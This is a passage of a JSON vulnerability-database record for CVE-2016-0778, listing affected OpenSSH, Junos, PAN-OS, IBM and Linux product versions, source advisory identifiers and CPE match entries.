"trust": 0.3,
"vendor": "extremenetworks",
"version": "7.0.3"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.1.0.0"
},
{
"model": "junos 14.1r3",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.10"
},
{
"model": "junos 12.1x46-d45",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.14"
},
{
"model": "junos 13.3r5",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 15.1r1",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "6.2p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "junos 12.1x47-d11",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "purepower integrated manager vhmc appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.0"
},
{
"model": "junos 15.1x49-d10",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.2"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4.0.0"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3"
},
{
"model": "junos 15.1f3",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2.0.0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.10"
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "16.1.2"
},
{
"model": "enterprise linux desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7"
},
{
"model": "enterprise linux workstation",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.8"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.1"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.8"
},
{
"model": "netsight appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "6.3.0.179"
},
{
"model": "extremexos patch",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "15.7.38"
},
{
"model": "junos 15.1r2",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 15.1f2",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "nac appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "5.0"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.37"
},
{
"model": "junos 12.3r11",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.5"
},
{
"model": "junos 15.1x49-d20",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "5.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.4"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.6"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.2"
},
{
"model": "junos 14.1r5",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.4"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.3"
},
{
"model": "nac appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "6.0"
},
{
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.70"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.7"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.1"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.4.0"
},
{
"model": "5.6p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "nsm4000",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "0"
},
{
"model": "junos 13.3r6",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x47-d20",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3"
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "6.0"
},
{
"model": "junos 14.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 14.1r1",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "virtual customer access system",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "14.06"
},
{
"model": "junos 12.1x46-d10",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "16.2"
},
{
"model": "linux -current",
"scope": null,
"trust": 0.3,
"vendor": "slackware",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.15"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.0.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.2"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"model": "junos 12.1x47-d10",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "nac appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "6.3.0.179"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.4"
},
{
"model": "opensuse evergreen",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11.4"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.37"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.8"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.1.0"
},
{
"model": "junos 14.1r4",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "15.10"
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "virtual customer access system",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "15.07"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"model": "identifi wireless",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "10.11"
},
{
"model": "tivoli provisioning manager for images",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.1.0"
},
{
"model": "7.1p2",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.4"
},
{
"model": "junos 12.3x48-d25",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.3x48-d15",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.0.0"
},
{
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "14.04"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "extremexos patch",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "15.7.31"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.4"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.13"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.5"
},
{
"model": "linux",
"scope": null,
"trust": 0.3,
"vendor": "gentoo",
"version": null
},
{
"model": "mac os security update",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x2016-0020"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.8"
},
{
"model": "junos 14.2r6",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.3"
},
{
"model": "junos 12.3x48-d30",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0"
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "4.4"
},
{
"model": "junos 12.1x47-d25",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.0"
},
{
"model": "junos 12.3r12",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "purepower integrated manager appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "flex system chassis management module 2pet",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.1"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.12"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.5"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.0.7"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.2"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.2"
},
{
"model": "tivoli provisioning manager for os deployment",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.1.19"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.6"
},
{
"model": "junos 15.1f1",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.1.2"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.12"
},
{
"model": "junos 13.3r1",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "13.1"
},
{
"model": "junos 12.1x46-d30",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "i",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"model": "extremexos",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "16.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.3"
},
{
"model": "junos 13.3r8",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.3"
},
{
"model": "junos 13.3r3",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x46-d25",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "6.2p2",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "junos 12.3x48-d20",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "7.1"
},
{
"model": "linux lts",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "12.04"
},
{
"model": "tivoli provisioning manager for os deployment",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.1"
},
{
"model": "linux mips",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"model": "purview",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "0"
},
{
"model": "nac appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "5.1"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.3"
},
{
"model": "junos 12.1x46-d36",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "purview",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "6.3"
},
{
"model": "junos 14.2r4",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.6"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2.1"
},
{
"model": "junos 15.1r3",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.3.0"
},
{
"model": "netsight appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "5.1"
},
{
"model": "junos 12.1x46-d40",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.1.1"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "7.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.2"
},
{
"model": "junos 15.1x49-d30",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.4.0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.6"
},
{
"model": "linux s/390",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "virtual customer access system",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "16.05"
},
{
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.0"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.14"
},
{
"model": "junos 13.3r9",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.0.0"
},
{
"model": "remote device access",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.1"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.9"
},
{
"model": "junos 14.2r3",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 14.2r5",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.0"
},
{
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"model": "tivoli provisioning manager for images",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "x7.1.1.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.4"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.0.7"
},
{
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"model": "power hmc",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3.0.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.00"
},
{
"model": "remote device access",
"scope": "ne",
"trust": 0.3,
"vendor": "hp",
"version": "8.7"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.0"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"model": "junos 15.1f5",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 13.3r7",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 14.2r1",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.3"
},
{
"model": "junos 12.1x46-d15",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.6"
},
{
"model": "smartcloud provisioning for software virtual appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"model": "junos 12.1x47-d15",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "7"
},
{
"model": "junos 14.1r2",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "6.1"
},
{
"model": "extremexos",
"scope": "eq",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "15.7.2"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.0.11"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.20"
},
{
"model": "junos 12.1x47-d35",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.4"
},
{
"model": "junos 12.3x48-d10",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "junos 12.1x46-d26",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.0.1"
},
{
"model": "identifi wireless",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "10.11.1"
},
{
"model": "p2",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "5.8"
},
{
"model": "netsight appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "extremenetworks",
"version": "7.0.3"
},
{
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.9"
},
{
"model": "purepower integrated manager power vc appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1"
},
{
"model": "opensuse",
"scope": "eq",
"trust": 0.3,
"vendor": "s u s e",
"version": "13.2"
},
{
"model": "junos 12.3r10",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "tivoli provisioning manager for images",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.1.19"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 0.3,
"vendor": "openssh",
"version": "7.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "15.04"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "5.1.1"
},
{
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.0"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.0.9"
},
{
"model": "pan-os",
"scope": "eq",
"trust": 0.3,
"vendor": "paloaltonetworks",
"version": "6.1.10"
},
{
"model": "junos 14.1r6",
"scope": null,
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.10.5"
},
{
"model": "6.9p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#456088"
},
{
"db": "BID",
"id": "80698"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001117"
},
{
"db": "CNNVD",
"id": "CNNVD-201601-250"
},
{
"db": "NVD",
"id": "CVE-2016-0778"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
